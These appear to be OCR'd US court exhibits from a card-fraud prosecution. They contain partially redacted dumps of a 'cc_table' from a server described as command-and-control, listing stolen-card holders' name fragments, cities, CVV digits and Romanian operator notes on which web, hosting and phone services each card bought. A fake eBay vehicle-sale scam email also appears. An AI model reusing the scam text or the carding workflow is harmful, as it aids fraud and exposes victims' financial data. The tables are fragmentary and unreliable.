| P | 1 | Round Rock | TX | ) | 10 | 2014 | -indeed |
| D | 7 | Orange | NJ | ) | 10 | 2014 | -indeed |
| R | 1 | Woodstock | IL | ) | 10 | 2014 | +indeed -yahooHost |
| jo | 9 | philadelphia | PA | ) | 11 | 2014 | dreamhost rezerva 64. +indeed +yahooHost*2 |
| g | 8 | novato | CA | ) | 11 | 2014 | invalid card #?? |
| B | 2 | furlong | PA | ) | 11 | 2014 | -indeed |
| w | 4 | stamford | CT | ) | 11 | 2014 | -indeed |
| Ja | 1 | cicero | IL | ) | 11 | 2014 | -indeed |
| IL | 1 | jax | FL | ) | 11 | 2014 | -indeed |
| c | 4 | Washington | DC | ) | 9 | 2016 | +indeed -yahooHost |
| N | 3 | Bethel Park | PA | ) | 8 | 2014 | -indeed |
| N | 2 | Irvine | CA | ) | 2 | 2014 | -indeed |
| to | 1 | syracuse | NY | ) | 5 | 2014 | -indeed |
| E | Ja | New York | NY | L | 11 | 2020 | -indeed |
| c | 5 | fort worth | TX | ) | 6 | 2015 | -indeed |
| N | 4 | PHOENIX | AZ | ) | 5 | 2015 | -yahooHost +indeed |
| Je | 3 | Martinez | CA | ) | 3 | 2014 | -yahooHost +indeed |
| A | 3 | Glendale | CA | ) | 12 | 2016 | +indeed +yahooHost |
| S | 5 | Chicago | IL | ) | 9 | 2013 | |
| R | 2 | Ontario | CA | ) | 12 | 2014 | PROST |
| c | 9 | corona | CA | ) | 6 | 2014 | FUCK |
| S | 1 | San Marcos | CA | ) | 6 | 2014 | FUCK |
| N | 3 | Baltimore | MD | ) | 4 | 2015 | peterdeck.net, rapidfax |
| B | 6 | Suffolk | VA | ) | 10 | 2014 | dreamhost 208 creators - update billing & re-enable?? am pus pe affsa |
| L | 2 | Kansas City | KS | ) | 11 | 2014 | -yahooHost |
| D | 7 | College Station | TX | ) | 11 | 2014 | -yahooHost |
| N | 1 | CHARLOTTE | NC | ) | 11 | 2014 | -yahooHost |
| Ja | 4 | Los Angeles | CA | ) | 11 | 2014 | -yahooHost |
| v | 3 | houston | TX | ) | 11 | 2014 | -yahooHost |
| A | 2 | San Rafael | CA | ) | 12 | 2014 | +yahooHost*3 +nod32 +skype |
| N | 1 | Houston | TX | ) | 12 | 2014 | -yahooHost*9 +skype +vumber |
| B | 6 | York | SC | ) | 12 | 2014 | -yahooHost |

Gov. Ex. 1165 Pg 8 of 10

9 Bertke - cc table

C and C server Dreamhost 206

| | | City | State | | Mo | Year | Notes |
|---|---|---|---|---|---|---|---|
| F | 22 | Lakeland | FL | ) | 12 | 2014 | +yahooHost +skype -vumber |
| S | 32 | Steger | IL | ) | 12 | 2014 | +yahooHost -vumber |
| J | 41 | Willow Grove | PA | ) | 12 | 2014 | |
| J | 67 | Ft Worth | TX | ) | 12 | 2014 | |
| E | 25 | Spring | TX | ) | 12 | 2014 | |
| | | | | | | | dreamhost 208. |
| E | 41 | Kingston | MA | ) | 7 | 2015 | |
| a | 35 | las vegas | NV | | 5 | 2014 | MInolta |
| k | 16 | Deer Park | NY | ) | 1 | 2015 | -skype |
| s | 91 | st.charles | MO | ) | 1 | 2015 | -skype |
| J | 37 | Libby | MT | ) | 2 | 2015 | +skype +callfire +yahooHost*4 |
| A | 45 | Lancaster | CA | | 7 | 2013 | |
| A | 20 | Tracy | CA | | 6 | 2014 | +skype -hostmonster |
| E | 62 | Oakland | CA | | 10 | 2013 | +yahooHost |
| R | 28 | brooklyn | NY | ! | 1 | 2014 | |
| n | 30 | largo | FL | ) | 2 | 2016 | |
| C | 54 | los angeles | CA | ) | 1 | 2014 | |
| a | 78 | chicago | IL | ) | 1 | 2014 | |
| n | 30 | kulpmont | PA | ) | 5 | 2014 | |
| E | 78 | corona | CA | ) | 5 | 2014 | |
| c | 31 | haltom | TX | ) | 5 | 2014 | |
| r | 10 | Laurel | MD | ) | 6 | 2014 | |
| b | 21 | sacramento | CA | ) | 10 | 2014 | |
| F | 75 | los angeles | CA | ) | 11 | 2014 | -yahooHost |
| c | 91 | Philadelphia | PA | ) | 11 | 2014 | +skype +yahooHost*6 |
| R | 12 | champlin | MN | ) | 11 | 2014 | |
| n | 24 | mesa | AZ | ) | 12 | 2014 | |
| | 14 | desoto | TX | ) | 12 | 2014 | +yahooHost*9 +yahooHostshlp |
| k | 23 | hoyt lakes | MN | ) | 12 | 2014 | +yahooHost*3+?? +omnis -virtualpbx |
| v | 27 | Chino Hills | CA | ) | 1 | 2015 | +yahooHost*5 -omnis -virtualpbx |
| E | 31 | elgin | TX | ) | 1 | 2015 | |
| s | 41 | marina del rey | CA | ) | 2 | 2015 | +yahooHost*2 |
| b | 34 | Aurora | IL | ) | 2 | 2015 | |
| d | 37 | los angeles | CA | ) | 3 | 2015 | +yahooHost*2, skype |
| T | 12 | Hayward | CA | ) | 3 | 2015 | +yahooHost*2 +callfire +aol |

Gov. Ex. 1165 Pg 9 of 10

10 Bertke – cc table                                    C and C server Dreamhost 206

| | | | | | | |
|---|---|---|---|---|---|
| | newark | NJ | ) | 3 | 201 | |
| | San Francisco | CA | ) | 4 | 201 | |
| | Queens | NY | ) | 4 | 201 | +compuserve +yahooHost*3 |
| | CLIFFSIDE PARK | NJ | ) | 11 | 201 | -yahooHost -virtualpbx |
| | Camarillo | CA | ) | 2 | 201 | ?yahooHost |
| | Mechanicsville | VA | ) | 12 | 201 | +skype -yahooHost |
| | fairfield | CA | ) | 10 | 201 | -virtualpbx |
| | | | | | | -virtualpbx -evoice -yahooHost- |
| | Burbank | IL | ) | 7 | 201 | no ?? |
| | Santa Clarita | CA | ) | 11 | 201 | +callfire +skype +yahooHost*7 |
| | santa rosa | CA | ) | 5 | 202 | -yahooHost |
| | fresno | CA | ) | 3 | 202 | -yahooHost |
| | Atlanta | GA | ) | 11 | 201 | -yahooHost |
| | frankfurt | IL | ) | 3 | 201 | -yahooHost |





GOVERNMENT
EXHIBIT
1:16CR224
1176



**Re: Sean Woodard 2008 Honda Odyssey**  from Sean Woodard to 1 recipient                 7:56 AM

I do not find the vehicle on EBAY. I have searched with Item # and then just with description. Is it still on there?

From: rexana battle <rexana.battle@aol.com>
To: █████████@.com
Sent: Wednesday, June 19, 2013 1:41 AM
Subject: Re: Sean Woodard 2008 Honda Odyssey

Thanks for the quick response! I have just relisted the car on eBay.

As I said before, right now I am on a business trip. However, shipping is already paid, because my buyer changed his mind after I have made the arrangements to ship the car. The trucking company would not refund me but can ship it to anywhere within continental US, so I've left it at their warehouse and it's ready to ship at anytime.

Item# is 2918679800575, you can search for it on eBay
Buy it now price: $9,280.00

Title is clear. No problems with the vehicle.

If you're interested please use the "Buy It Now" option on eBay. This way our transaction will be protected by eBay. You will have to make the payment as a bank transfer, you'll find details on the auction page. However, if you request it, eBay will lock my bank account so I will not have access to the money you send me for the car until you inspect it and approve it. I'm OK with that too.

I'll be able to ship the car as soon as I receive the payment. I'm sure you'll love it.

On 6/18/2013 at 10:2 PM swoodard7456@yahoo.com wrote:

I am still interested. This is the one in early, correct? I am currently bidding on another on EBAY and went to DFW this weekend and working on a deal with automation in Lewisville if they can meet my offer. I am not off work until Friday but by then I will know about other vans I'm looking at. What is the best price for yours. If one of the other deals does  not go through or if yours is a better deal then I would like to come see it Friday afternoon. If we agree on a deal I could get a cashiers check or cash that day. Thanks, Sean

Dreamhost – ps373645

cc_table

| Id | good | notes | name | address1 | address2 | city | state | zip | phone | cc | expm | expy | cvv | reserved |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 1 | 0 | minolta | Ed | | | | | | | | | | 74 | 0 |
| 2 | 0 | minolta de testat | lar | | | | | | | | | | 79 | 0 |
| 3 | 0 | minolta, -yahooHost | Da | | | | | | | | | | 55 | 0 |
| 4 | 0 | proasta | Ric | | | | | | | | | | 95 | 0 |
| 5 | 0 | proasta | Da | | | | | | | | | | 79 | 0 |
| 6 | 0 | natiune 3-10-2012 -> 3 cumparaturi | Ke | | | | | | | | | | 90 | 0 |
| 7 | 0 | natiune 3-10-2012 | Jol | | | | | | | | | | 47 | 0 |
| 8 | 0 | prost | the | | | | | | | | | | 80 | 0 |
| 9 | 0 | natiune (enom.com) 12-10-2012 / linx yahoo plus | JAI | | | | | | | | | | 73 | 0 |
| 10 | 0 | | Nic | | | | | | | | | | 40 | 0 |
| 11 | 0 | | Nic | | | | | | | | | | 63 | 0 |
| 12 | 0 | natiune host 12-10-2012 | rar | | | | | | | | | | 9 | 0 |
| 13 | 0 | natiune host 12-10-2012 / linx yahoo plus | Bo | | | | | | | | | | 38 | 0 |
| 14 | 0 | | Nic | | | | | | | | | | 63 | 0 |
| 15 | 0 | | mi | | | | | | | | | | 24 | 0 |
| 16 | 0 | | jor | | | | | | | | | | 56 | 0 |
| 17 | 0 | natiune host 12-10-2012 | Da | | | | | | | | | | 67 | 0 |
| 18 | 0 | natiune host 12-10-2012/ linx yahoo plus | rai | | | | | | | | | | 99 | 0 |
| 19 | 0 | natiune host 12-10-2012 | An | | | | | | | | | | 39 | 0 |
| 20 | 0 | linx yahoo plus / AOL | gai | | | | | | | | | | 65 | 0 |
| 21 | 0 | minolta | pa | | | | | | | | | | 91 | 0 |
| 22 | 0 | minolta multe cumparaturi dar mal merge | RA | | | | | | | | | | 04 | 0 |
| 23 | 0 | minolta multe cumparaturi dar mal merge | Mi | | | | | | | | | | 22 | 0 |
| 24 | 0 | minolta multe cumparaturi dar mal merge | An | | | | | | | | | | 65 | 0 |
| 25 | 0 | minolta multe cumparaturi dar mal merge | ge | | | | | | | | | | 69 | 0 |
| 26 | 0 | minolta mort | Gil | | | | | | | | | | 18 | 0 |
| 27 | 0 | minolta mort | Jar | | | | | | | | | | 03 | 0 |
| 28 | 0 | minolta mort | Jef | | | | | | | | | | 18 | 0 |
| 29 | 0 | minolta mort | DA | | | | | | | | | | 91 | 0 |
| 30 | 0 | minolta multe cumparaturi dar mal mergea | Mi | | | | | | | | | | 93 | 0 |
| 31 | 0 | minolta mort | ph | | | | | | | | | | 66 | 0 |
| 32 | 0 | minolta mort | Ro | | | | | | | | | | 39 | 0 |
| 33 | 0 | minolta mort | Ge | | | | | | | | | | 86 | 0 |
| 34 | 0 | 25-10-2012 natiune ymall +yahooHost -yahooHost | KE | | | | | | | | | | 86 | 0 |
| 35 | 0 | keke | Ra | | | | | | | | | | 37 | 0 |
| 36 | 0 | #NAME? | Fra | | | | | | | | | | 98 | 0 |
| 37 | 0 | keke | Jos | | | | | | | | | | 35 | 0 |
| 38 | 0 | | rol | | | | | | | | | | | 0 |
| 39 | 0 | | Ba | | | | | | | | | | 49 | 0 |
| 40 | 0 | | ge | | | | | | | | | | 95 | 0 |
| 41 | 0 | testing pt hostinguri NU folositi | Bo | | | | | | | | | | 61 | 0 |
| 42 | 0 | dreamhost vps -yahooHost | Ed | | | | | | | | | | 68 | 0 |
| 43 | 0 | dreamhost vps | MI | | | | | | | | | | 64 | 0 |
| 66 | 0 | Skype | Ro | | | | | | | | | | 85 | 0 |
| 65 | 0 | yahoo hostx2, failed skype -yahooHost | Jol | | | | | | | | | | 61 | 0 |
| 63 | 0 | skype | Da | | | | | | | | | | 40 | 0 |
| 64 | 0 | keke | Ca | | | | | | | | | | 99 | 0 |
| 67 | 0 | Skype | Gla | | | | | | | | | | | 0 |
| 68 | 0 | MORT | an | | | | | | | | | | 51 | 0 |
| 69 | 0 | MORT | Eli | | | | | | | | | | 69 | 0 |
| 70 | 0 | beemer mort | An | | | | | | | | | | 99 | 0 |
| 71 | 0 | beemer | Re | | | | | | | | | | 79 | 0 |
| 72 | 0 | qwe Skype | Jef | | | | | | | | | | 11 | 0 |
| 73 | 0 | beemer | Jos | | | | | | | | | | 36 | 0 |
| 74 | 0 | beemer | Lin | | | | | | | | | | 55 | 0 |
| 75 | 0 | beemer | gu | | | | | | | | | | 98 | 0 |
| 76 | 0 | linx yahoo plus, -yahooHost | An | | | | | | | | | | 00 | 0 |
| 120 | 0 | mort | | | | | | | | | | | | 0 |
| 121 | 0 | mort | | | | | | | | | | | | 0 |
| 122 | 0 | mort | | | | | | | | | | | | 0 |

Gov. Ex. 1204 Pg 1 of 10

GOVERNMENT
EXHIBIT
1:16CR224
1204

Dreamhost - ps373645

cc_table

| | | | | | | | |
|---|---|---|---|---|---|---|---|
| 123 | 0 | mort | | | | | 0 |
| 81 | 0 | natlune / drona att (6-02-13), yah drona +yahooHost -c | | | 4D11208846454640 | 1 | 0 |
| 82 | 0 | natlune / drona lpage (6-02-13) drona presenttravel [1 | | | | 1 | 0 |
| 83 | 0 | MORT | | | | 1 | 0 |
| 124 | 0 | mort | | | | 1 | 0 |
| 125 | 0 | mort | | | | 1 | 0 |
| 126 | 0 | mort | | | | | 0 |
| 127 | 0 | mort | | | | | 0 |
| 85 | 0 | MORT | | | | 1 | 0 |
| 89 | 0 | #NAME? | | | | 1 | 0 |
| 90 | 0 | mort | | | | 1 | 0 |
| 91 | 0 | craigs phone / Indeed  MORT | | | | 1 | 0 |
| 92 | 0 | craigs phone MORT | | | | 1 | 0 |
| 93 | 0 | craigs phone MORT | | | | 1 | 0 |
| 94 | 0 | mort | | | | 1 | 0 |
| 95 | 0 | mort | | | | 1 | 0 |
| 96 | 0 | craigs phone +yahoo hosting +yahooHost -indeed | | | | 1 | 0 |
| 97 | 0 | craigs phone +yahooHost*2 unknown error | | | | 1 | 0 |
| 98 | 0 | mort | | | | 1 | 0 |
| 99 | 0 | craigs phone MORT | | | | 1 | 0 |
| 100 | 0 | yahoo x2 mort | | | | 1 | 0 |
| 101 | 0 | craigs phone | | | | 1 | 0 |
| 102 | 0 | craigs phone / indeed, securecrt,+yahooHost *5 | | | | 1 | 0 |
| 103 | 0 | craigs phone, yahoo -yahooHost | | | | 1 | 0 |
| 104 | 0 | craigs phone +yahooHost -yahooHost | | | | 1 | 0 |
| 105 | 0 | indeed MORT | | | | 1 | 0 |
| 106 | 0 | craigs phone / indeed mort | | | | 1 | 0 |
| 107 | 0 | mort | | | | 1 | 0 |
| 108 | 0 | craigs phone +yahooHost*2 +indeed -yahooHost unkno | | | | 1 | 0 |
| 109 | 0 | craigs phone / skype / vumber MORT | | | | 1 | 0 |
| 110 | 0 | craigs phone / indeed, yahoo plus +yahooHost -yahooH | | | | 1 | 0 |
| 113 | 0 | yahoo SMS, nu il folositi | | | | 1 | 0 |
| 114 | 0 | rezervat minolta | | | | 1 | 0 |
| 115 | 0 | rezervat minolta | | | | 1 | 0 |
| 117 | 0 | used , Osaylohosting | | | | 1 | 0 |
| 118 | 0 | mort | | | | | 0 |
| 119 | 0 | mort | | | | | 0 |
| 128 | 0 | mort | | | | | 0 |
| 129 | 0 | mort | | | | | 0 |
| 130 | 0 | mort | | | | | 0 |
| 131 | 0 | mort | | | | | 0 |
| 132 | 0 | mort | | | | | 0 |
| 133 | 0 | mort | | | | | 0 |
| 134 | 0 | mort | | | | | 0 |
| 135 | 0 | mort | | | | | 0 |
| 136 | 0 | mort | | | | | 0 |
| 137 | 0 | mort | | | | | 0 |
| 138 | 0 | mort | | | | | 0 |
| 139 | 0 | mort | | | | | 0 |
| 140 | 0 | mort | | | | | 0 |
| 141 | 0 | mort | | | | | 0 |
| 142 | 0 | mort | | | | | 0 |
| 143 | 0 | mort | | | | | 0 |
| 144 | 0 | mort | | | | | 0 |
| 145 | 0 | mort | | | | | 0 |
| 146 | 0 | mort | | | | | 0 |
| 147 | 0 | mort | | | | | 0 |
| 148 | 0 | mort | | | | | 0 |
| 149 | 0 | mort | | | | | 0 |
| 150 | 0 | mort | | | | | 0 |
| 151 | 0 | mort | | | | | 0 |

Gov. Ex. 1204 Pg 2 of 10

Dreamhost - ps373645

cc_table

| | | | |
|---|---|---|---|
| 152 | 0 | mort | 0 |
| 156 | 0 | #NAME? | 0 |
| 157 | 0 | +yahooHost*5 +indeed -skype | 0 |
| 158 | 0 | #NAME? | 0 |
| 159 | 0 | +yahooHost -yahooHost | 0 |
| 160 | 0 | +yahooHost*5 +indeed | 0 |
| 161 | 0 | #NAME? | 0 |
| 162 | 0 | -yahooHost*6 +indeed | 0 |
| 163 | 0 | +yahooHost*3 -indeed | 0 |
| 164 | 0 | +yahooHost*3 -indeed | 0 |
| 165 | 0 | +yahooHost*5 test4indeed EXPIRAT | 0 |
| 166 | 0 | #NAME? | 0 |
| 167 | 0 | #NAME? | 0 |
| 168 | 0 | #NAME? | 0 |
| 169 | 0 | +yahooHost*3 -indeed | 0 |
| 170 | 0 | #NAME? | 0 |
| 171 | 0 | +yahooHost*10 +indeed +editplus -3lx | 0 |
| 172 | 0 | #NAME? | 0 |
| 173 | 0 | #NAME? | 0 |
| 174 | 0 | #NAME? | 0 |
| 175 | 0 | #NAME? | 0 |
| 178 | 0 | #NAME? | 0 |
| 179 | 0 | #NAME? | 0 |
| 180 | 0 | #NAME? | 0 |
| 181 | 0 | #NAME? | 0 |
| 182 | 0 | dreamhost 67 my*2 - update billing thai host | 0 |
| 183 | 0 | +yahooHost*2 +vumber +indeed -yahooHost | 0 |
| 185 | 0 | +yahooHost*2 +skype +indeed | 0 |
| 186 | 0 | #NAME? | 0 |
| 187 | 0 | #NAME? | 0 |
| 188 | 0 | +yahooHost -yahooHost | 0 |
| 189 | 0 | #NAME? | 0 |
| 190 | 0 | +yahooHost*7 +indeed +virtualpbx -3lx | 0 |
| 191 | 0 | #NAME? | 0 |
| 192 | 0 | #NAME? | 0 |
| 193 | 0 | +yahooHost*3 -indeed | 0 |
| 195 | 0 | #NAME? | 0 |
| 196 | 0 | #NAME? | 0 |
| 197 | 0 | #NAME? | 0 |
| 198 | 0 | #NAME? | 0 |
| 199 | 0 | #NAME? | 0 |
| 200 | 0 | #NAME? | 0 |
| 201 | 0 | +yahooHost*2 +indeed +monster.com -yahooHost | 0 |
| 202 | 0 | #NAME? | 0 |
| 203 | 0 | #NAME? | 0 |
| 204 | 0 | #NAME? | 0 |
| 205 | 0 | +yahooHost*3 -indeed | 0 |
| 206 | 0 | #NAME? | 0 |
| 207 | 0 | #NAME? | 0 |
| 208 | 0 | #NAME? | 0 |
| 209 | 0 | +yahooHost*3 +indeed -yahooHost | 0 |
| 210 | 0 | +yahooHost*6 +indeed | 0 |
| 211 | 0 | #NAME? | 0 |
| 212 | 0 | #NAME? | 0 |
| 213 | 0 | #NAME? | 0 |
| 214 | 0 | #NAME? | 0 |
| 215 | 0 | #NAME? | 0 |
| 216 | 0 | #NAME? | 0 |
| 300 | 0 | #NAME? | 0 |
| 217 | 0 | #NAME? | 0 |
| 218 | 0 | #NAME? | 0 |

Gov. Ex. 1204 Pg 3 of 10

Dreamhost - ps373645

cc_table

| # | | Text | |
|---|---|---|---|
| 219 | 0 | #NAME? | c |
| 220 | 0 | jobvertise.com, monster.com (390), beyond.com (500) | b |
| 221 | 0 | #NAME? | T |
| 222 | 0 | #NAME? | a |
| 223 | 0 | #NAME? | K |
| 224 | 0 | #NAME? | J |
| 225 | 0 | #NAME? | R |
| 226 | 0 | #NAME? | J |
| 227 | 0 | +yahooHost*10 +indeed +backpage +3ix -virtualpbx -el | s |
| 228 | 0 | #NAME? | n |
| 229 | 0 | #NAME? | c |
| 230 | 0 | #NAME? | C |
| 231 | 0 | apcfile +yahooHost*3 +indeed +facebook + skype -califf | C |
| 232 | 0 | #NAME? | H |
| 233 | 0 | -yahooHost*2 +indeed +backpage | K |
| 234 | 0 | -yahooHost*2 +indeed | F |
| 235 | 0 | #NAME? | n |
| 236 | 0 | #NAME? | g |
| 237 | 0 | +yahooHost*3 +indeed +fb | h |
| 238 | 0 | #NAME? | K |
| 239 | 0 | #NAME? | K |
| 240 | 0 | #NAME? | S |
| 241 | 0 | #NAME? | a |
| 242 | 0 | #NAME? | A |
| 243 | 0 | +yahooHost*3 -indeed +skype -dream +norton -califir | C |
| 244 | 0 | -yahooHost +indeed +craigs | B |
| 245 | 0 | #NAME? | n |
| 246 | 0 | -yahooHost -indeed | A |
| 247 | 0 | #NAME? | K |
| 248 | 0 | #NAME? | R |
| 249 | 0 | +yahooHost*2 +indeed | V |
| 250 | 0 | #NAME? | h |
| 251 | 0 | | c |
| 252 | 0 | +yahooHost*2 +indeed +califire | u |
| 253 | 0 | +indeed +yahooHost*3 +bing -norton | S |
| 254 | 0 | +indeed -yahooHost | C |
| 255 | 0 | -yahooHost -indeed | L |
| 256 | 0 | +indeed +postjobfree.com -pvaspot -yahooHost | K |
| 257 | 0 | #NAME? | P |
| 258 | 0 | #NAME? | C |
| 259 | 0 | +indeed -yahooHost | R |
| 261 | 0 | dreamhost reserva 64, +indeed +yahooHost*2 MORT C | x |
| 262 | 0 | invalid card #?? | g |
| 263 | 0 | #NAME? | B |
| 264 | 0 | #NAME? | w |
| 265 | 0 | #NAME? | J |
| 266 | 0 | #NAME? | h |
| 267 | 0 | +indeed -yahooHost | c |
| 268 | 0 | #NAME? | h |
| 269 | 0 | #NAME? | A |
| 270 | 0 | #NAME? | b |
| 271 | 0 | #NAME? | E |
| 272 | 0 | #NAME? | c |
| 273 | 0 | #NAME? | h |
| 274 | 0 | #NAME? | R |
| 275 | 0 | +indeed +yahooHost | A |
| 276 | 0 | | S |
| 277 | 0 | PROST | R |
| 278 | 0 | FUCK | c |
| 279 | 0 | FUCK | S |
| 280 | 0 | peterdeck.net, rapidfax | h |

| | |
|---|---|
| 9 | 0 |
| 4 | 0 |
| 1 | 0 |
| 1 | 0 |
| 9 | 0 |
| 9 | 0 |
| 5 | 0 |
| 1 | 0 |
| 8 | 0 |
| 2 | 0 |
| 8 | 0 |
| 4 | 0 |
| 4 | 0 |
| 4 | 0 |
| 5 | 0 |
| 8 | 0 |
| 8 | 0 |
| 5 | 0 |
| 9 | 0 |
| 6 | 0 |
| 2 | 0 |
| 9 | 0 |
| 9 | 0 |
| 3 | 0 |
| 3 | 0 |
| 1 | 0 |
| 4 | 0 |
| 6 | 0 |
| 0 | 0 |
| 7 | 0 |
| 7 | 0 |
| 1 | 0 |
| 8 | 0 |
| 9 | 0 |
| 5 | 0 |
| 1 | 0 |
| 4 | 0 |
| 4 | 0 |
| 9 | 0 |
| 6 | 0 |
| 7 | 0 |
| 1 | 0 |
| 5 | 0 |
| 6 | 0 |
| 5 | 0 |
| 0 | 0 |
| 2 | 0 |
| 4 | 0 |
| 3 | 1 |
| 5 | 0 |
| 2 | 0 |
| 3 | 0 |
| 4 | 0 |
| 7 | 0 |
| 7 | 0 |
| 5 | 0 |
| 9 | 1 |
| 2 | 0 |
| 4 | 0 |
| 4 | 1 |

Gov. Ex. 1204 Pg 4 of 10

Dreamhost - ps373645

cc_table

| # | | | | | |
|---|---|---|---|---|---|
| 281 | 0 | MORT | B | 3 | 0 |
| 282 | 0 | #NAME? | L | 7 | 0 |
| 283 | 0 | #NAME? | D | 1 | 0 |
| 284 | 0 | #NAME? | N | 6 | 0 |
| 285 | 0 | #NAME? | J | 2 | 0 |
| 286 | 0 | #NAME? | v | 0 | 0 |
| 287 | 0 | +yahooHost*3 +nod32 +skype | A | 3 | 0 |
| 288 | 0 | -yahooHost*9 +skype +vumber | N | 7 | 0 |
| 289 | 0 | #NAME? | B | 5 | 0 |
| 290 | 0 | +yahooHost +skype -vumber | P | 5 | 0 |
| 291 | 0 | +yahooHost -vumber | SI | 1 | 0 |
| 292 | 0 | | J | 0 | 0 |
| 293 | 0 | | J | 1 | 0 |
| 294 | 0 | | D | 9 | 0 |
| 295 | 0 | dreamhost 208. | E | 1 | 0 |
| 296 | 0 | Minolta +yahooHost*2 blocat pe yahoo | + | 4 | 0 |
| 297 | 0 | #NAME? | K | 5 | 0 |
| 298 | 0 | #NAME? | s | 0 | 0 |
| 299 | 0 | #NAME? | J | 8 | 0 |
| 303 | 0 | | A | 2 | 0 |
| 302 | 0 | DREAMHOST REZERVA +skype -hostmonster +yahooHost*6 | A | 7 | 0 |
| 304 | 0 | +yahooHost | E | 4 | 0 |
| 305 | 0 | | R | 1 | 0 |
| 306 | 0 | | m | 0 | 0 |
| 307 | 0 | | c | 5 | 0 |
| 308 | 0 | | s | 8 | 0 |
| 309 | 0 | | n | 2 | 0 |
| 310 | 0 | | g | 6 | 0 |
| 311 | 0 | | b | 2 | 0 |
| 312 | 0 | | c | 0 | 0 |
| 313 | 0 | | rl | 9 | 0 |
| 314 | 0 | #NAME? | b | 0 | 0 |
| 315 | 0 | #NAME? | P | 2 | 0 |
| 316 | 0 | | c | 2 | 0 |
| 317 | 0 | | R | 2 | 0 |
| 318 | 0 | +yahooHost*11 +yahooHostshlp +hostmonster +skype + vumber +att - privateInternetaccess - ebay | m | 0 | 0 |
| 319 | 0 | +yahooHost*3+?? +omnis -virtualpbx | b | 2 | 0 |
| 320 | 0 | -yahooHost*5 -omnis +virtualpbx | W | 0 | 0 |
| 321 | 0 | | b | 5 | 0 |
| 322 | 0 | +yahooHost*2 | s | 6 | 0 |
| 323 | 0 | | H | 1 | 0 |
| 324 | 0 | +yahooHost*2, skype | d | 9 | 0 |
| 325 | 0 | +yahooHost*2 +callfire +aol | T | 4 | 0 |
| 326 | 0 | | al | 9 | 0 |
| 327 | 0 | | m | 1 | 0 |
| 328 | 0 | #NAME? | p | 9 | 0 |
| 329 | 0 | -yahooHost -virtualpbx | N | 1 | 0 |
| 330 | 0 | -yahooHost ?? any good -ebay | N | 2 | 0 |
| 331 | 0 | #NAME? | P | 6 | 0 |
| 332 | 0 | #NAME? | y | 2 | 0 |
| 333 | 0 | -virtualpbx -evoice -yahooHost-no ?? | R | 4 | 0 |
| 334 | 0 | #NAME? | Je | 5 | 0 |
| 489 | 0 | fost dream208 mai are $4972 | R | 5 | 0 |

Gov. Ex. 1204 Pg 5 of 10

Dreamhost - ps373645

cc_table

| | | | | | |
|---|---|---|---|---|---|
| 335 | 0 | #NAME? | n | i | 0 |
| 336 | 0 | #NAME? | Ja | i | 0 |
| 337 | 0 | #NAME? | Ja | i | 0 |
| 338 | 0 | #NAME? | si | i | 0 |
| 339 | 0 | #NAME? | R | i | 0 |
| 340 | 0 | #NAME? | V | i | 0 |
| 341 | 0 | #NAME? | C | i | 1 |
| 342 | 0 | #NAME? | G | i | 0 |
| 343 | 0 | #NAME? | o | i | 0 |
| 344 | 0 | #NAME? | Je | i | 0 |
| 345 | 0 | #NAME? | A | i | 0 |
| 346 | 0 | #NAME? | cl | i | 0 |
| 347 | 0 | #NAME? | g | i | 0 |
| 348 | 0 | #NAME? | m | i | 0 |
| 349 | 0 | #NAME? | b | i | 0 |
| 350 | 0 | #NAME? | K | i | 0 |
| 351 | 0 | minolta +yahooHost -yahooHost | A | i | 1 |
| 352 | 0 | minolta +yahooHost*3 | C | | 0 |
| 353 | 0 | minolta | b | i | 0 |
| 354 | 0 | minolta | Lu | i | 0 |
| 355 | 0 | minolta | e | i | 0 |
| 356 | 0 | minolta www.mediatemple.net declined hpcloud.com works +yahooHost biocat pe yahoo | Jr | i | 0 |
| 357 | 0 | minolta mediatemple.net biocat pe yahoo | V | i | 0 |
| 358 | 0 | minolta mediatemple.net | St | i | 0 |
| 359 | 0 | amazon si ceva hosturi, merge de omorat | T | i | 0 |
| 445 | 0 | | a | i | 0 |
| 361 | 0 | minolta mediatemple.net | si | i | 0 |
| 362 | 0 | amazon si ceva hosturi minolta mediatemple.net declii | a | i | 0 |
| 363 | 0 | | Fi | i | 0 |
| 364 | 0 | | Iv | i | 0 |
| 365 | 0 | | E | i | 0 |
| 366 | 0 | | fr | i | 0 |
| 367 | 0 | | d | i | 0 |
| 368 | 0 | | Si | i | 0 |
| 369 | 0 | minolta mediatemple.net | ri | i | 0 |
| 370 | 0 | | e | i | 0 |
| 371 | 0 | | cl | i | 0 |
| 372 | 0 | | A | i | 0 |
| 373 | 0 | | D | i | 0 |
| 374 | 0 | | C | i | 0 |
| 375 | 0 | | lv | i | 0 |
| 376 | 0 | | Si | i | 0 |
| 377 | 0 | | te | i | 0 |
| 378 | 0 | | Lu | i | 0 |
| 379 | 0 | | R | i | 0 |
| 380 | 0 | | K | i | 0 |
| 381 | 0 | | K | i | 0 |
| 382 | 0 | | N | i | 0 |
| 389 | 0 | | Ls | i | 0 |
| 384 | 0 | minolta +yahooHost*22 | e | i | 0 |
| 385 | 0 | | h | i | 0 |
| 386 | 0 | | Jc | i | 0 |
| 387 | 0 | | D | i | 0 |
| 388 | 0 | | Jc | i | 0 |
| 389 | 0 | | cl | i | 0 |
| 390 | 0 | | Ja | i | 0 |
| 391 | 0 | | G | i | 0 |
| 392 | 0 | | B | i | 0 |
| 393 | 0 | | d | i | 0 |
| 394 | 0 | | D | i | 0 |

Gov. Ex. 1204 Pg 6 of 10

Dreamhost - ps373645

cc_table

| | | | | | | | | | | |
|---|---|---|---|---|---|---|---|---|---|---|
| 395 | 0 | | | | | | | | 8 | 0 |
| 396 | 0 | | | | | | | | 2 | 0 |
| 397 | 0 | | | | | | | | 1 | 0 |
| 398 | 0 | | | | | | | | 8 | 0 |
| 399 | 0 | | | | | | | | 2 | 0 |
| 400 | 0 | | | | | | | | 3 | 0 |
| 401 | 0 | minolta +yahooHost*6 | | | | | | | 1 | 0 |
| 402 | 0 | | | | | | | | 8 | 0 |
| 403 | 0 | minolta | | | | | | | 5 | 0 |
| 404 | 0 | | | | | | | | 8 | 0 |
| 405 | 0 | | | | | | | | 1 | 0 |
| 406 | 0 | | | | | | | | 1 | 0 |
| 407 | 0 | minolta | | | | | | | 8 | 0 |
| 408 | 0 | | | | | | | | 8 | 0 |
| 409 | 0 | | | | | | | | 7 | 0 |
| 410 | 0 | | | | | | | | 9 | 0 |
| 411 | 0 | minolta | | | | | | | 5 | 0 |
| 412 | 0 | | | | | | | | 7 | 0 |
| 413 | 0 | | | | | | | | 2 | 0 |
| 414 | 0 | | | | | | | | 6 | 0 |
